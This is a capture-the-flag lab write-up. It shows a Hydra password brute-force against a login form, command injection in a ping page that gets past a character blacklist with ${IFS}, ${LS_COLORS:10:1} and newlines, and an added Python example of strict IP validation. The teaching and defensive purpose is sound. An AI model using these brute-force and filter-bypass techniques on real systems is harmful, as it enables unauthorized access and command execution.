monitoring.inlanefreight.local
It redirects us to a simple login page.

Note that the login form uses a POST request. Now we brute-force the password using admin as the username.
hydra -l admin -P /usr/share/wordlists/seclists/Passwords/darkweb2017-top1000.txt monitoring.inlanefreight.local http-post-form "/login.php:username=admin&password=^PASS^:Invalid Credentials!" -I -t 48
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-18 17:30:46
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 48 tasks per 1 server, overall 48 tasks, 999 login tries (l:1/p:999), ~21 tries per task
[DATA] attacking http-post-form://monitoring.inlanefreight.local:80/login.php:username=admin&password=^PASS^:Invalid Credentials!
[80][http-post-form] host: monitoring.inlanefreight.local login: admin password: 12qwaszx
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-18 17:30:50

It's a web shell:


Connection_test sends a GET request to /ping.php

Send it to Repeater and we see that it tries to ping 127.0.0.1 and outputs the result.

Trying different command injections. The space character (127.0.0.1%20) doesn't work but 127.0.0.1${IFS} works.
For operators, the semicolon (;) doesn't work but ${LS_COLORS:10:1} works.
So far it looks like this:
The space character doesn't allow adding other commands and operators, so that was a failure. The newline character is not blacklisted, and it allows us to run other commands with slight modification.

I was able to use the cat command, which isn't blacklisted, to read the flag, using ${IFS} for the space character.
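
Why the character blacklist failed and what fixes it, as an added example (not code from the lab or the original write-up): the filter is modelled as a denylist of the two characters reported as blocked above, which is an assumption since the source of ping.php is not shown, and it is compared with strict IP parsing plus an argv list that never reaches a shell. All function names and sample inputs are constructed for illustration.

```python
import ipaddress
import subprocess

# Assumption: the lab's filter is modelled as a denylist of the two characters
# the write-up reports as blocked (space and semicolon).
DENYLIST = {" ", ";"}

def denylist_accepts(value: str) -> bool:
    """Weak check: accept anything that contains no denylisted character."""
    return not any(ch in DENYLIST for ch in value)

def allowlist_accepts(value: str) -> bool:
    """Strict check: accept only a string that parses as an IP address."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False

def build_ping_argv(value: str) -> list[str]:
    """Return an argv list for ping; never a shell command string."""
    ip = ipaddress.ip_address(value)      # raises ValueError on anything else
    return ["ping", "-c", "1", str(ip)]   # canonical form, not the raw input

def ping(value: str) -> str:
    # A list with the default shell=False means ${...} is never expanded
    # and a newline cannot start a second command.
    out = subprocess.run(build_ping_argv(value), capture_output=True,
                         text=True, timeout=5)
    return out.stdout

# Constructed samples, using only the input shapes mentioned in the write-up.
SAMPLES = [
    "127.0.0.1",
    "127.0.0.1 ",
    "127.0.0.1;",
    "127.0.0.1${IFS}",
    "127.0.0.1${LS_COLORS:10:1}",
    "127.0.0.1\n",
]

def compare() -> list[tuple[str, bool, bool]]:
    """Return (sample, denylist verdict, allowlist verdict) for each sample."""
    return [(s, denylist_accepts(s), allowlist_accepts(s)) for s in SAMPLES]

if __name__ == "__main__":
    for sample, weak, strict in compare():
        print(f"{sample!r:32} denylist={weak!s:5} allowlist={strict}")
```

The denylist passes every variant that avoids a literal space or semicolon, while the allowlist accepts only the plain address.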